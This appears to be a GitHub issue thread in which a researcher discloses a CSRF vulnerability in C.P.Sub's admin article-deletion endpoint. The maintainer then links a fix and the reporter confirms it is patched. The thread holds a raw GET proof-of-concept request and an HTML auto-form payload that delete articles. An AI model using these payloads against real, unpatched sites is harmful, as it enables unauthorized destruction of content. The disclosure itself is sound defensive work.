CSRF - Delete an announcement article arbitrarily

[KdiagHaci]

Hey , C.P.Sub

In your Background admin delete Article section, did not produce relevant token verification source caused CSRF, and the "get" parameter value is very dangerous.

List：

http://website/manage.php?p=article_list

Poc Payload：

**

GET /manage.php?p=article_del&id=ID HTTP/1.1 Host: your_website Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 Referer: http://127.0.0.1/456/manage.php?p=article_list Accept-Encoding: gzip, deflate Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=test%7C1537587372%7CgZf4275f8FC9rh5rffBvPrfPZwQBwSdtTLoKtW1JdQ6%7C4350d349b75ea62d1bbd963b4ee5460a95206b92a5df2dd7899ff7ccdc51bea3; wp-settings-1=mfold%3Do; wp-settings-time-1=1537414573; cerber_groove=49d7bce85e1b8082ab6d6cdf0854abc8; cerber_groove_x_Ad7onvqFrh3GYs8jQ1I24UyDpVRC=G0c9tWNuhQ4Z8azbyspmHrx7fYE5XM; _awtvW=Zqmk3E; gXSlbZOPaVqTWrR=%5DjCLPER7IhSHZkD; tUAnShmrCET=gLvmBVQPSwn; AJeZVoHYa=Gd3nvWzpe; PHPSESSID=hbdcrh6cj6jgl9v4jo5gedbcp6 Connection: close

**

Poc Payload：

<html>
<head>
<title>CSRF</title>
</head>
<body>

  <script>history.pushState('', '', '/')</script>
    <form action="http://website/manage.php">
      <input type="hidden" name="p" value="article&#95;del" />
      <input type="hidden" name="id" value="2" />
      <input type="submit" value="Hello" />
    </form>

</body>
</html>

You can see that after obtaining the parameters of the direct splicing instructions, also echo the relevant commands, no relevant rigorous filter inspection caused the vulnerability：

[cooltey]

Please check/review the PR to see if it resolves the issue.

[KdiagHaci]

Hey, Cooltey

Thank you for your reply.

I'm sure the problem has been patched up.

Regards,